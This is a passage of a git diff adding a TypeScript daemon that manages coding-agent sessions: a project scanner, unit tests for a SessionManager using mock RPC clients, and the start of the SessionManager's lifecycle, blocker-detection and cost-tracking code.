+  const results: ProjectInfo[] = [];
+
+  for (const root of scanRoots) {
+    let entries: string[];
+    try {
+      entries = await readdir(root);
+    } catch {
+      // Missing root or permission error — skip gracefully
+      continue;
+    }
+
+    for (const entry of entries) {
+      // Skip hidden directories and node_modules
+      if (entry.startsWith('.') || entry === 'node_modules') continue;
+
+      const entryPath = join(root, entry);
+
+      // Must be a directory
+      let entryStat;
+      try {
+        entryStat = await stat(entryPath);
+      } catch {
+        // Permission error or disappeared entry — skip
+        continue;
+      }
+      if (!entryStat.isDirectory()) continue;
+
+      // Detect markers
+      const markers: ProjectMarker[] = [];
+      let latestMtime = 0;
+
+      for (const [markerFile, markerType] of MARKER_MAP) {
+        const markerPath = join(entryPath, markerFile);
+        try {
+          const markerStat = await stat(markerPath);
+          markers.push(markerType);
+          if (markerStat.mtimeMs > latestMtime) {
+            latestMtime = markerStat.mtimeMs;
+          }
+        } catch {
+          // Marker doesn't exist — not an error
+        }
+      }
+
+      // Only include directories with at least one marker
+      if (markers.length === 0) continue;
+
+      results.push({
+        name: basename(entryPath),
+        path: entryPath,
+        markers,
+        lastModified: latestMtime,
+      });
+    }
+  }
+
+  // Sort alphabetically by name
+  results.sort((a, b) => a.name.localeCompare(b.name));
+
+  return results;
+}
diff --git a/packages/daemon/src/session-manager.test.ts b/packages/daemon/src/session-manager.test.ts
new file mode 100644
index 000000000..8adccd670
--- /dev/null
+++ b/packages/daemon/src/session-manager.test.ts
@@ -0,0 +1,822 @@
+/**
+ * SessionManager unit tests.
+ *
+ * Uses the MockRpcClient + TestableSessionManager pattern (K008) to test
+ * session lifecycle, event handling, cost tracking, blocker detection,
+ * and cleanup without spawning real GSD processes.
+ */
+
+import { describe, it, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { resolve, basename } from 'node:path';
+import { mkdtempSync, writeFileSync, mkdirSync, rmSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+
+import { SessionManager } from './session-manager.js';
+import { MAX_EVENTS } from './types.js';
+import type { ManagedSession, PendingBlocker } from './types.js';
+import { Logger } from './logger.js';
+
+// ---------------------------------------------------------------------------
+// Mock RpcClient (duck-typed to match RpcClient interface)
+// ---------------------------------------------------------------------------
+
+class MockRpcClient {
+  started = false;
+  stopped = false;
+  aborted = false;
+  prompted: string[] = [];
+  private eventListeners: Array<(event: Record<string, unknown>) => void> = [];
+  uiResponses: Array<{ requestId: string; response: Record<string, unknown> }> = [];
+
+  /** Control — set to make start() reject */
+  startError: Error | null = null;
+  /** Control — set to make init() reject */
+  initError: Error | null = null;
+  /** Control — override sessionId from init */
+  initSessionId = 'mock-session-001';
+
+  cwd: string;
+  args: string[];
+
+  constructor(options?: Record<string, unknown>) {
+    this.cwd = (options?.cwd as string) ?? '';
+    this.args = (options?.args as string[]) ?? [];
+  }
+
+  async start(): Promise<void> {
+    if (this.startError) throw this.startError;
+    this.started = true;
+  }
+
+  async stop(): Promise<void> {
+    this.stopped = true;
+  }
+
+  async init(): Promise<{ sessionId: string; version: string }> {
+    if (this.initError) throw this.initError;
+    return { sessionId: this.initSessionId, version: '2.51.0' };
+  }
+
+  onEvent(listener: (event: Record<string, unknown>) => void): () => void {
+    this.eventListeners.push(listener);
+    return () => {
+      const idx = this.eventListeners.indexOf(listener);
+      if (idx >= 0) this.eventListeners.splice(idx, 1);
+    };
+  }
+
+  async prompt(message: string): Promise<void> {
+    this.prompted.push(message);
+  }
+
+  async abort(): Promise<void> {
+    this.aborted = true;
+  }
+
+  sendUIResponse(requestId: string, response: Record<string, unknown>): void {
+    this.uiResponses.push({ requestId, response });
+  }
+
+  /** Test helper — emit an event to all listeners */
+  emitEvent(event: Record<string, unknown>): void {
+    for (const listener of this.eventListeners) {
+      listener(event);
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// TestableSessionManager — injects mock clients without module mocking (K008)
+// ---------------------------------------------------------------------------
+
+class TestableSessionManager extends SessionManager {
+  lastClient: MockRpcClient | null = null;
+  allClients: MockRpcClient[] = [];
+  private sessionCounter = 0;
+  nextInitError: Error | null = null;
+  nextStartError: Error | null = null;
+
+  override async startSession(options: { projectDir: string; command?: string; model?: string; bare?: boolean; cliPath?: string }): Promise<string> {
+    const { projectDir } = options;
+
+    if (!projectDir || projectDir.trim() === '') {
+      throw new Error('projectDir is required and cannot be empty');
+    }
+
+    const resolvedDir = resolve(projectDir);
+    const projectName = basename(resolvedDir);
+
+    // Check duplicate via getSessionByDir
+    const existing = this.getSessionByDir(resolvedDir);
+    if (existing) {
+      throw new Error(
+        `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})`
+      );
+    }
+
+    const client = new MockRpcClient({ cwd: resolvedDir, args: [] });
+    if (this.nextStartError) {
+      client.startError = this.nextStartError;
+      this.nextStartError = null;
+    }
+    if (this.nextInitError) {
+      client.initError = this.nextInitError;
+      this.nextInitError = null;
+    }
+
+    this.sessionCounter++;
+    client.initSessionId = `mock-session-${String(this.sessionCounter).padStart(3, '0')}`;
+    this.lastClient = client;
+    this.allClients.push(client);
+
+    // Build session shell
+    const session: ManagedSession = {
+      sessionId: '',
+      projectDir: resolvedDir,
+      projectName,
+      status: 'starting',
+      client: client as any, // duck-typed mock
+      events: [],
+      pendingBlocker: null,
+      cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } },
+      startTime: Date.now(),
+    };
+
+    // Insert into internal sessions map
+    (this as any).sessions.set(resolvedDir, session);
+
+    try {
+      await client.start();
+
+      const initResult = await client.init();
+      session.sessionId = initResult.sessionId;
+      session.status = 'running';
+
+      // Wire event tracking using parent's handleEvent
+      session.unsubscribe = client.onEvent((event: Record<string, unknown>) => {
+        (this as any).handleEvent(session, event);
+      });
+
+      // Kick off auto-mode
+      const command = options.command ?? '/gsd auto';
+      await client.prompt(command);
+
+      // Emit lifecycle events (matching parent behavior)
+      (this as any).logger.info('session started', { sessionId: session.sessionId, projectDir: resolvedDir });
+      this.emit('session:started', { sessionId: session.sessionId, projectDir: resolvedDir, projectName });
+
+      return session.sessionId;
+    } catch (err) {
+      session.status = 'error';
+      session.error = err instanceof Error ? err.message : String(err);
+      try { await client.stop(); } catch { /* swallow */ }
+
+      (this as any).logger.error('session error', { sessionId: session.sessionId, projectDir: resolvedDir, error: session.error });
+      this.emit('session:error', { sessionId: session.sessionId, projectDir: resolvedDir, projectName, error: session.error });
+
+      throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`);
+    }
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Logger spy helper
+// ---------------------------------------------------------------------------
+
+interface LogCall {
+  level: string;
+  msg: string;
+  data?: Record<string, unknown>;
+}
+
+class SpyLogger {
+  calls: LogCall[] = [];
+  private tmpDir: string;
+  logger: Logger;
+
+  constructor() {
+    this.tmpDir = mkdtempSync(join(tmpdir(), 'sm-test-'));
+    this.logger = new Logger({
+      filePath: join(this.tmpDir, 'test.log'),
+      level: 'debug',
+    });
+
+    // Intercept write calls by wrapping the logger methods
+    const original = {
+      debug: this.logger.debug.bind(this.logger),
+      info: this.logger.info.bind(this.logger),
+      warn: this.logger.warn.bind(this.logger),
+      error: this.logger.error.bind(this.logger),
+    };
+
+    this.logger.debug = (msg: string, data?: Record<string, unknown>) => {
+      this.calls.push({ level: 'debug', msg, data });
+      original.debug(msg, data);
+    };
+    this.logger.info = (msg: string, data?: Record<string, unknown>) => {
+      this.calls.push({ level: 'info', msg, data });
+      original.info(msg, data);
+    };
+    this.logger.warn = (msg: string, data?: Record<string, unknown>) => {
+      this.calls.push({ level: 'warn', msg, data });
+      original.warn(msg, data);
+    };
+    this.logger.error = (msg: string, data?: Record<string, unknown>) => {
+      this.calls.push({ level: 'error', msg, data });
+      original.error(msg, data);
+    };
+  }
+
+  async cleanup(): Promise<void> {
+    await this.logger.close();
+    try { rmSync(this.tmpDir, { recursive: true, force: true }); } catch { /* ignore */ }
+  }
+
+  findCalls(level: string, msgSubstring: string): LogCall[] {
+    return this.calls.filter(c => c.level === level && c.msg.includes(msgSubstring));
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Test Helpers
+// ---------------------------------------------------------------------------
+
+let allManagers: TestableSessionManager[] = [];
+let allSpyLoggers: SpyLogger[] = [];
+
+function createManager(): { manager: TestableSessionManager; spy: SpyLogger } {
+  const spy = new SpyLogger();
+  const manager = new TestableSessionManager(spy.logger);
+  allManagers.push(manager);
+  allSpyLoggers.push(spy);
+  return { manager, spy };
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+describe('SessionManager', () => {
+  afterEach(async () => {
+    for (const m of allManagers) {
+      try { await m.cleanup(); } catch { /* swallow */ }
+    }
+    allManagers = [];
+    for (const s of allSpyLoggers) {
+      await s.cleanup();
+    }
+    allSpyLoggers = [];
+  });
+
+  // ---- Lifecycle: start → running → completed ----
+
+  it('start → running → completed lifecycle', async () => {
+    const { manager, spy } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/test-project' });
+    assert.ok(sessionId);
+
+    const session = manager.getSession(sessionId);
+    assert.ok(session);
+    assert.equal(session.status, 'running');
+    assert.equal(session.projectName, 'test-project');
+
+    // Simulate terminal notification
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'n1',
+      method: 'notify',
+      message: 'Auto-mode stopped: completed all tasks',
+    });
+
+    assert.equal(session.status, 'completed');
+
+    // Verify logger calls
+    const startedLogs = spy.findCalls('info', 'session started');
+    assert.equal(startedLogs.length, 1);
+    const completedLogs = spy.findCalls('info', 'session completed');
+    assert.equal(completedLogs.length, 1);
+  });
+
+  // ---- Lifecycle: start → running → blocked → resolve → running → completed ----
+
+  it('start → blocked → resolve → running → completed lifecycle', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/test-project-2' });
+    const session = manager.getSession(sessionId)!;
+
+    // Simulate blocking UI request (non-fire-and-forget method)
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'blocker-1',
+      method: 'confirm',
+      title: 'Merge PR?',
+      message: 'Should I merge this PR?',
+    });
+
+    assert.equal(session.status, 'blocked');
+    assert.ok(session.pendingBlocker);
+    assert.equal(session.pendingBlocker!.id, 'blocker-1');
+    assert.equal(session.pendingBlocker!.method, 'confirm');
+
+    // Resolve the blocker
+    await manager.resolveBlocker(sessionId, 'yes');
+
+    assert.equal(session.status, 'running');
+    assert.equal(session.pendingBlocker, null);
+
+    // Verify UI response was sent
+    const client = manager.lastClient!;
+    assert.equal(client.uiResponses.length, 1);
+    assert.equal(client.uiResponses[0].requestId, 'blocker-1');
+
+    // Complete the session
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'n2',
+      method: 'notify',
+      message: 'Auto-mode stopped: all done',
+    });
+
+    assert.equal(session.status, 'completed');
+  });
+
+  // ---- Lifecycle: start → error (init failure) ----
+
+  it('start → error when init fails', async () => {
+    const { manager, spy } = createManager();
+
+    manager.nextInitError = new Error('Connection refused');
+
+    await assert.rejects(
+      () => manager.startSession({ projectDir: '/tmp/test-error-project' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('Connection refused'));
+        return true;
+      }
+    );
+
+    // Session should still exist in map with error status
+    const session = manager.getSessionByDir('/tmp/test-error-project');
+    assert.ok(session);
+    assert.equal(session.status, 'error');
+    assert.ok(session.error?.includes('Connection refused'));
+
+    // Logger should have error call
+    const errorLogs = spy.findCalls('error', 'session error');
+    assert.equal(errorLogs.length, 1);
+  });
+
+  // ---- Duplicate session prevention ----
+
+  it('rejects duplicate session for same projectDir', async () => {
+    const { manager } = createManager();
+
+    await manager.startSession({ projectDir: '/tmp/dup-test' });
+
+    await assert.rejects(
+      () => manager.startSession({ projectDir: '/tmp/dup-test' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('Session already active'));
+        return true;
+      }
+    );
+  });
+
+  // ---- Cancel session ----
+
+  it('cancels a running session', async () => {
+    const { manager, spy } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/cancel-test' });
+    const session = manager.getSession(sessionId)!;
+    const client = manager.lastClient!;
+
+    await manager.cancelSession(sessionId);
+
+    assert.equal(session.status, 'cancelled');
+    assert.ok(client.aborted);
+    assert.ok(client.stopped);
+
+    const cancelLogs = spy.findCalls('info', 'session cancelled');
+    assert.equal(cancelLogs.length, 1);
+  });
+
+  // ---- Cost accumulation (K004 cumulative-max) ----
+
+  it('accumulates cost using cumulative-max pattern (K004)', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/cost-test' });
+    const session = manager.getSession(sessionId)!;
+    const client = manager.lastClient!;
+
+    // First cost update
+    client.emitEvent({
+      type: 'cost_update',
+      runId: 'run-1',
+      turnCost: 0.01,
+      cumulativeCost: 0.01,
+      tokens: { input: 100, output: 50, cacheRead: 20, cacheWrite: 10 },
+    });
+
+    assert.equal(session.cost.totalCost, 0.01);
+    assert.equal(session.cost.tokens.input, 100);
+
+    // Second cost update — cumulative values should increase
+    client.emitEvent({
+      type: 'cost_update',
+      runId: 'run-1',
+      turnCost: 0.02,
+      cumulativeCost: 0.03,
+      tokens: { input: 250, output: 120, cacheRead: 40, cacheWrite: 20 },
+    });
+
+    assert.equal(session.cost.totalCost, 0.03);
+    assert.equal(session.cost.tokens.input, 250);
+    assert.equal(session.cost.tokens.output, 120);
+
+    // Third update with lower values — max should hold
+    client.emitEvent({
+      type: 'cost_update',
+      runId: 'run-2',
+      turnCost: 0.005,
+      cumulativeCost: 0.02, // lower than 0.03 — should NOT replace
+      tokens: { input: 50, output: 30, cacheRead: 5, cacheWrite: 2 },
+    });
+
+    assert.equal(session.cost.totalCost, 0.03); // max held
+    assert.equal(session.cost.tokens.input, 250); // max held
+  });
+
+  // ---- Ring buffer event trimming ----
+
+  it('trims events when exceeding MAX_EVENTS', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/ringbuf-test' });
+    const session = manager.getSession(sessionId)!;
+    const client = manager.lastClient!;
+
+    // Push MAX_EVENTS + 20 events
+    for (let i = 0; i < MAX_EVENTS + 20; i++) {
+      client.emitEvent({
+        type: 'assistant_message',
+        id: `msg-${i}`,
+        content: `Event ${i}`,
+      });
+    }
+
+    assert.equal(session.events.length, MAX_EVENTS);
+    // Oldest events should be trimmed — first event should be #20
+    const firstEvent = session.events[0] as Record<string, unknown>;
+    assert.equal(firstEvent.id, 'msg-20');
+  });
+
+  // ---- Blocker detection (non-fire-and-forget extension_ui_request) ----
+
+  it('detects blocker from non-fire-and-forget extension_ui_request', async () => {
+    const { manager, spy } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/blocker-test' });
+    const session = manager.getSession(sessionId)!;
+
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'sel-1',
+      method: 'select',
+      title: 'Choose deployment target',
+      options: ['staging', 'production'],
+    });
+
+    assert.equal(session.status, 'blocked');
+    assert.ok(session.pendingBlocker);
+    assert.equal(session.pendingBlocker!.method, 'select');
+
+    const blockedLogs = spy.findCalls('info', 'session blocked');
+    assert.equal(blockedLogs.length, 1);
+  });
+
+  // ---- Fire-and-forget methods do NOT block ----
+
+  it('fire-and-forget methods do not trigger blocker', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/faf-test' });
+    const session = manager.getSession(sessionId)!;
+
+    // setStatus is fire-and-forget
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'st-1',
+      method: 'setStatus',
+      statusKey: 'build',
+      statusText: 'Building...',
+    });
+
+    assert.equal(session.status, 'running');
+    assert.equal(session.pendingBlocker, null);
+  });
+
+  // ---- Terminal detection (auto-mode stopped notification) ----
+
+  it('detects terminal from auto-mode stopped notification', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/terminal-test' });
+    const session = manager.getSession(sessionId)!;
+
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'n1',
+      method: 'notify',
+      message: 'Step-mode stopped: user requested',
+    });
+
+    assert.equal(session.status, 'completed');
+  });
+
+  // ---- getAllSessions returns all tracked sessions ----
+
+  it('getAllSessions returns all tracked sessions', async () => {
+    const { manager } = createManager();
+
+    await manager.startSession({ projectDir: '/tmp/proj-a' });
+    await manager.startSession({ projectDir: '/tmp/proj-b' });
+    await manager.startSession({ projectDir: '/tmp/proj-c' });
+
+    const all = manager.getAllSessions();
+    assert.equal(all.length, 3);
+
+    const dirs = all.map(s => s.projectDir).sort();
+    assert.ok(dirs[0].endsWith('proj-a'));
+    assert.ok(dirs[1].endsWith('proj-b'));
+    assert.ok(dirs[2].endsWith('proj-c'));
+  });
+
+  // ---- cleanup stops all active sessions ----
+
+  it('cleanup stops all active sessions', async () => {
+    const { manager } = createManager();
+
+    await manager.startSession({ projectDir: '/tmp/cleanup-a' });
+    await manager.startSession({ projectDir: '/tmp/cleanup-b' });
+
+    const clients = [...manager.allClients];
+    assert.equal(clients.length, 2);
+
+    await manager.cleanup();
+
+    const all = manager.getAllSessions();
+    for (const s of all) {
+      assert.equal(s.status, 'cancelled');
+    }
+    // Both clients should have been stopped
+    for (const c of clients) {
+      assert.ok(c.stopped);
+    }
+  });
+
+  // ---- EventEmitter: session:started ----
+
+  it('emits session:started event', async () => {
+    const { manager } = createManager();
+
+    let emittedData: Record<string, unknown> | undefined;
+    manager.on('session:started', (data: Record<string, unknown>) => { emittedData = data; });
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/emit-start' });
+
+    assert.ok(emittedData);
+    assert.equal(emittedData.sessionId, sessionId);
+    assert.equal(emittedData.projectName, 'emit-start');
+  });
+
+  // ---- EventEmitter: session:blocked ----
+
+  it('emits session:blocked event', async () => {
+    const { manager } = createManager();
+
+    let emittedData: Record<string, unknown> | undefined;
+    manager.on('session:blocked', (data: Record<string, unknown>) => { emittedData = data; });
+
+    await manager.startSession({ projectDir: '/tmp/emit-blocked' });
+
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'b-1',
+      method: 'input',
+      title: 'Enter API key',
+    });
+
+    assert.ok(emittedData);
+    assert.equal((emittedData.blocker as PendingBlocker).id, 'b-1');
+  });
+
+  // ---- EventEmitter: session:completed ----
+
+  it('emits session:completed event', async () => {
+    const { manager } = createManager();
+
+    let emittedData: Record<string, unknown> | undefined;
+    manager.on('session:completed', (data: Record<string, unknown>) => { emittedData = data; });
+
+    await manager.startSession({ projectDir: '/tmp/emit-completed' });
+
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'n1',
+      method: 'notify',
+      message: 'Auto-mode stopped: success',
+    });
+
+    assert.ok(emittedData);
+    assert.equal(emittedData.projectName, 'emit-completed');
+  });
+
+  // ---- EventEmitter: session:error ----
+
+  it('emits session:error event on init failure', async () => {
+    const { manager } = createManager();
+
+    let emittedData: Record<string, unknown> | undefined;
+    manager.on('session:error', (data: Record<string, unknown>) => { emittedData = data; });
+
+    manager.nextInitError = new Error('Process crashed');
+
+    try {
+      await manager.startSession({ projectDir: '/tmp/emit-error' });
+    } catch { /* expected */ }
+
+    assert.ok(emittedData);
+    assert.ok((emittedData.error as string).includes('Process crashed'));
+  });
+
+  // ---- EventEmitter: session:event ----
+
+  it('emits session:event for every forwarded event', async () => {
+    const { manager } = createManager();
+
+    const events: Record<string, unknown>[] = [];
+    manager.on('session:event', (data) => { events.push(data); });
+
+    await manager.startSession({ projectDir: '/tmp/emit-event' });
+
+    manager.lastClient!.emitEvent({ type: 'assistant_message', id: 'a1', content: 'Hello' });
+    manager.lastClient!.emitEvent({ type: 'tool_use', id: 't1', name: 'read' });
+
+    assert.equal(events.length, 2);
+  });
+
+  // ---- Empty projectDir rejection ----
+
+  it('rejects empty projectDir', async () => {
+    const { manager } = createManager();
+
+    await assert.rejects(
+      () => manager.startSession({ projectDir: '' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('projectDir is required'));
+        return true;
+      }
+    );
+
+    await assert.rejects(
+      () => manager.startSession({ projectDir: '   ' }),
+      (err: Error) => {
+        assert.ok(err.message.includes('projectDir is required'));
+        return true;
+      }
+    );
+  });
+
+  // ---- Logger receives structured calls ----
+
+  it('logger receives structured calls during lifecycle', async () => {
+    const { manager, spy } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/log-test' });
+
+    // Should have 'session started' info log
+    const started = spy.findCalls('info', 'session started');
+    assert.equal(started.length, 1);
+    assert.ok(started[0].data?.sessionId);
+    assert.ok(started[0].data?.projectDir);
+
+    // Emit an event — should produce debug log
+    manager.lastClient!.emitEvent({ type: 'assistant_message', id: 'a1', content: 'hi' });
+    const debugLogs = spy.findCalls('debug', 'session event');
+    assert.ok(debugLogs.length >= 1);
+    assert.ok(debugLogs[0].data?.type);
+  });
+
+  // ---- getResult returns structured status ----
+
+  it('getResult returns structured status', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/result-test' });
+    const result = manager.getResult(sessionId);
+
+    assert.equal(result.sessionId, sessionId);
+    assert.equal(result.status, 'running');
+    assert.equal(result.projectName, 'result-test');
+    assert.equal(result.error, null);
+    assert.equal(result.pendingBlocker, null);
+    assert.ok(typeof result.durationMs === 'number');
+    assert.ok(result.cost);
+    assert.ok(Array.isArray(result.recentEvents));
+  });
+
+  // ---- getResult throws for unknown session ----
+
+  it('getResult throws for unknown sessionId', () => {
+    const { manager } = createManager();
+
+    assert.throws(
+      () => manager.getResult('nonexistent'),
+      (err: Error) => err.message.includes('Session not found')
+    );
+  });
+
+  // ---- resolveBlocker throws when no blocker pending ----
+
+  it('resolveBlocker throws when no blocker pending', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/no-blocker' });
+
+    await assert.rejects(
+      () => manager.resolveBlocker(sessionId, 'yes'),
+      (err: Error) => err.message.includes('No pending blocker')
+    );
+  });
+
+  // ---- cancelSession throws for unknown session ----
+
+  it('cancelSession throws for unknown sessionId', async () => {
+    const { manager } = createManager();
+
+    await assert.rejects(
+      () => manager.cancelSession('nonexistent'),
+      (err: Error) => err.message.includes('Session not found')
+    );
+  });
+
+  // ---- Blocked notification detected as blocker, not terminal ----
+
+  it('blocked notification sets status to blocked, not completed', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/tmp/blocked-notify' });
+    const session = manager.getSession(sessionId)!;
+
+    manager.lastClient!.emitEvent({
+      type: 'extension_ui_request',
+      id: 'bn-1',
+      method: 'notify',
+      message: 'Auto-mode stopped: Blocked: waiting for approval',
+    });
+
+    assert.equal(session.status, 'blocked');
+    assert.ok(session.pendingBlocker);
+  });
+
+  // ---- projectName is basename of resolved projectDir ----
+
+  it('projectName is basename of projectDir', async () => {
+    const { manager } = createManager();
+
+    const sessionId = await manager.startSession({ projectDir: '/home/user/projects/my-app' });
+    const session = manager.getSession(sessionId)!;
+
+    assert.equal(session.projectName, 'my-app');
+  });
+
+  // ---- Custom command is sent instead of default ----
+
+  it('sends custom command when provided', async () => {
+    const { manager } = createManager();
+
+    await manager.startSession({ projectDir: '/tmp/custom-cmd', command: '/gsd quick fix-typo' });
+    const client = manager.lastClient!;
+
+    assert.ok(client.prompted.includes('/gsd quick fix-typo'));
+    assert.ok(!client.prompted.includes('/gsd auto'));
+  });
+
+  // ---- getSessionByDir returns session by directory lookup ----
+
+  it('getSessionByDir returns session by directory', async () => {
+    const { manager } = createManager();
+
+    await manager.startSession({ projectDir: '/tmp/dir-lookup' });
+    const session = manager.getSessionByDir('/tmp/dir-lookup');
+
+    assert.ok(session);
+    assert.equal(session.projectName, 'dir-lookup');
+  });
+});
diff --git a/packages/daemon/src/session-manager.ts b/packages/daemon/src/session-manager.ts
new file mode 100644
index 000000000..d954e37db
--- /dev/null
+++ b/packages/daemon/src/session-manager.ts
@@ -0,0 +1,394 @@
+/**
+ * SessionManager — manages RpcClient lifecycle for daemon-driven GSD execution.
+ *
+ * Extends EventEmitter to emit typed session lifecycle events.
+ * One active session per projectDir. Tracks events in a ring buffer,
+ * detects blockers, tracks terminal state, and accumulates cost using
+ * the cumulative-max pattern (K004).
+ *
+ * Adapted from packages/mcp-server/src/session-manager.ts with:
+ * - Logger integration for structured logging
+ * - EventEmitter for session lifecycle events
+ * - getAllSessions() for cross-project status (R035)
+ * - projectName field on ManagedSession
+ */
+
+import { execSync } from 'node:child_process';
+import { basename, resolve } from 'node:path';
+import { EventEmitter } from 'node:events';
+import { RpcClient } from '@gsd-build/rpc-client';
+import type { SdkAgentEvent, RpcInitResult, RpcCostUpdateEvent, RpcExtensionUIRequest } from '@gsd-build/rpc-client';
+import type {
+  ManagedSession,
+  StartSessionOptions,
+  PendingBlocker,
+} from './types.js';
+import { MAX_EVENTS, INIT_TIMEOUT_MS } from './types.js';
+import type { Logger } from './logger.js';
+
+// ---------------------------------------------------------------------------
+// Inlined detection logic (from headless-events.ts — no internal package imports)
+// ---------------------------------------------------------------------------
+
+const FIRE_AND_FORGET_METHODS = new Set([
+  'notify', 'setStatus', 'setWidget', 'setTitle', 'set_editor_text',
+]);
+
+const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped'];
+
+function isTerminalNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false;
+  const message = String(event.message ?? '').toLowerCase();
+  return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix));
+}
+
+function isBlockedNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false;
+  const message = String(event.message ?? '').toLowerCase();
+  return message.includes('blocked:');
+}
+
+function isBlockingUIRequest(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request') return false;
+  const method = String(event.method ?? '');
+  return !FIRE_AND_FORGET_METHODS.has(method);
+}
+
+// ---------------------------------------------------------------------------
+// SessionManager
+// ---------------------------------------------------------------------------
+
+export class SessionManager extends EventEmitter {
+  /** Sessions keyed by resolved projectDir for duplicate-start prevention */
+  private sessions = new Map<string, ManagedSession>();
+
+  constructor(private readonly logger: Logger) {
+    super();
+  }
+
+  /**
+   * Start a new GSD auto-mode session for the given project directory.
+   *
+   * Rejects if a session already exists for this projectDir.
+   * Creates an RpcClient, starts the process, performs the v2 init handshake,
+   * wires event tracking, and sends '/gsd auto' to begin execution.
+   */
+  async startSession(options: StartSessionOptions): Promise<string> {
+    const { projectDir } = options;
+
+    if (!projectDir || projectDir.trim() === '') {
+      throw new Error('projectDir is required and cannot be empty');
+    }
+
+    const resolvedDir = resolve(projectDir);
+    const projectName = basename(resolvedDir);
+
+    const existing = this.sessions.get(resolvedDir);
+    if (existing) {
+      throw new Error(
+        `Session already active for ${resolvedDir} (sessionId: ${existing.sessionId}, status: ${existing.status})`
+      );
+    }
+
+    const cliPath = options.cliPath ?? SessionManager.resolveCLIPath();
+
+    const args: string[] = ['--mode', 'rpc'];
+    if (options.model) args.push('--model', options.model);
+    if (options.bare) args.push('--bare');
+
+    const client = new RpcClient({
+      cliPath,
+      cwd: resolvedDir,
+      args,
+    });
+
+    // Build the session shell before async operations so we can track state
+    const session: ManagedSession = {
+      sessionId: '', // filled after init
+      projectDir: resolvedDir,
+      projectName,
+      status: 'starting',
+      client,
+      events: [],
+      pendingBlocker: null,
+      cost: { totalCost: 0, tokens: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 } },
+      startTime: Date.now(),
+    };
+
+    // Insert into map early (keyed by dir) so concurrent starts are rejected
+    this.sessions.set(resolvedDir, session);
+
+    try {
+      // Start the process with timeout
+      await Promise.race([
+        client.start(),
+        timeout(INIT_TIMEOUT_MS, `RpcClient.start() timed out after ${INIT_TIMEOUT_MS}ms`),
+      ]);
+
+      // Perform v2 init handshake
+      const initResult: RpcInitResult = await Promise.race([
+        client.init(),
+        timeout(INIT_TIMEOUT_MS, `RpcClient.init() timed out after ${INIT_TIMEOUT_MS}ms`),
+      ]) as RpcInitResult;
+
+      session.sessionId = initResult.sessionId;
+      session.status = 'running';
+
+      // Wire event tracking
+      session.unsubscribe = client.onEvent((event: SdkAgentEvent) => {
+        this.handleEvent(session, event);
+      });
+
+      // Kick off auto-mode
+      const command = options.command ?? '/gsd auto';
+      await client.prompt(command);
+
+      this.logger.info('session started', { sessionId: session.sessionId, projectDir: resolvedDir });
+      this.emit('session:started', { sessionId: session.sessionId, projectDir: resolvedDir, projectName });
+
+      return session.sessionId;
+    } catch (err) {
+      session.status = 'error';
+      session.error = err instanceof Error ? err.message : String(err);
+
+      // Attempt cleanup
+      try { await client.stop(); } catch { /* swallow cleanup errors */ }
+
+      this.logger.error('session error', { sessionId: session.sessionId, projectDir: resolvedDir, error: session.error });
+      this.emit('session:error', { sessionId: session.sessionId, projectDir: resolvedDir, projectName, error: session.error });
+
+      // Keep session in map so callers can inspect the error
+      throw new Error(`Failed to start session for ${resolvedDir}: ${session.error}`);
+    }
+  }
+
+  /**
+   * Look up a session by sessionId.
+   * Linear scan is fine — we expect <10 concurrent sessions.
+   */
+  getSession(sessionId: string): ManagedSession | undefined {
+    for (const session of this.sessions.values()) {
+      if (session.sessionId === sessionId) return session;
+    }
+    return undefined;
+  }
+
+  /**
+   * Look up a session by project directory (direct map lookup).
+   */
+  getSessionByDir(projectDir: string): ManagedSession | undefined {
+    return this.sessions.get(resolve(projectDir));
+  }
+
+  /**
+   * Return all tracked sessions (R035 — cross-project status).
+   */
+  getAllSessions(): ManagedSession[] {
+    return Array.from(this.sessions.values());
+  }
+
+  /**
